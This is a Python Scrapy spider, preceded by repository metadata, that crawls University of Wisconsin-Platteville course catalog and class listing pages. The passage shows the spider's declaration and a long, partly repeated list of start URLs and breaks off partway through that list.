| 52.96 | 192 | 0.717586 | 2,853 | 15,888 | 3.556607 | 0.064143 | 0.098059 | 0.068986 | 0.118262 | 0.849611 | 0.817286 | 0.795605 | 0.782497 | 0.730659 | 0.699517 | 0 | 0.032025 | 0.180451 | 15,888 | 299 | 193 | 53.137124 | 0.747254 | 0.02612 | 0 | 0.539568 | 0 | 0 | 0.052155 | 0.002912 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017986 | null | null | 0.097122 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81bfa720b7d30a66fb8d8f12a20ce0311d7b181d | 32,495 | py | Python | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Platteville/plateville_links/plateville_links/spiders/get_links3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null |
from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from plateville_links.items import PlatevilleLinksItem
class plateville_links(scrapy.Spider):
name = 'plateville_links3'
allowed_domains = ['uwplatt.edu']
start_urls = [
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHEMSTRY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSED/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGLISH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGINDUS/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGSCI/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ART/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", 
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOLOGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GERMAN/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHSC/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHYSICS/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUAP/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOCIOLGY/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPANISH/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPEECH/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/TEACHING/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/THEATRE/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HHP/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HISTORY/GRAD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", 
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSED/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/ISCM/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PROJMGT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", 
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ACCTING/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGBUS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGEDUC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGET/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGRIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ANSCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/APC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ART/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/F/FORENSIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/F/FRENCH/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GENENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOLOGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GERMAN/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ELECTENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENERGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGLISH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGRPHYS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENTRP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENVENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENVHORT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ESL/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHEMSTRY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHINESE/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CIVILENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSPSY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CR-SPAN/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HHP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HISTORY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDSTENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MECHENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MSNT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUAP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHSC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHYSICS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PORTUG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SCSCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SEJ/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOCIOLGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOFTWARE/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPANISH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPEECH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/STAT/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/TEACHING/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/THEATRE/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", 